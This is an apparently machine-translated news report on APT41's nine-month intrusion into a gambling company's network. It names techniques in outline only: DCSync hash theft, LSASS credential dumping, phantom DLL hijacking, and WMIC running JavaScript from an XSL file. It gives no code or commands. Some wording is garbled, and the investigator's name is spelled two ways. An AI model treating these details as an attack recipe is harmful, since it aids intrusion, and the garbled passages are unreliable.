APT41 group conducted a cyber attack on the gambling sector, acting secretly and adapting their tools to IB activity. This is a cybercrime association, also known as Brass Typhoon, Earth Baku, Wicked Panda, and Winnti, was in the client’s networks from the above industry for almost nine months, collecting confidential data and bypassing security systems.
The Israeli company Security Jones, which participated in the investigation of the incident, said that the attackers removed network configurations, user passwords, and data from the LSASS process. The founder of the company IDO NAR noted: “Hackers modified tools based on the actions of the defenders, supporting access and imperceptibly changing strategies.”
During the attack, methods were used similar to that are observed in Crimson Palace Operations, monitored by Sophos. Naor also emphasized that the malicious campaign probably had financial motivation, despite state support.
Apt41 used a complex set of tactics to circumvent protective measures and create hidden remote access channels. One of the attack methods was DCSYNC – the collection of hash passwords to capture the administrator’s accounts and access expansion. Phantom Dll Hijacking attacks and legitimate system utilities were also used, such as “wmic.exe.”
Although the exact method of penetration into the network remains unknown, Phishing letters were probably used, since the vulnerabilities of external applications or exposure to the supply chain were not found. After penetration, the attackers focused on the accounts of administrators and developers to maintain control over the infrastructure.
Security Jones revealed that the attackers temporarily stopped their activity after discovery, but later returned with an updated approach. They used a focused JavaScript code in the XSL file to perform malicious commands through the WMIC utility.
The feature of the campaign was to filter the infected devices on IP addresses containing the setting “10.20.22”, which indicates the intended use of the VPN networks. This approach allowed attackers to amaze only the devices that interest them.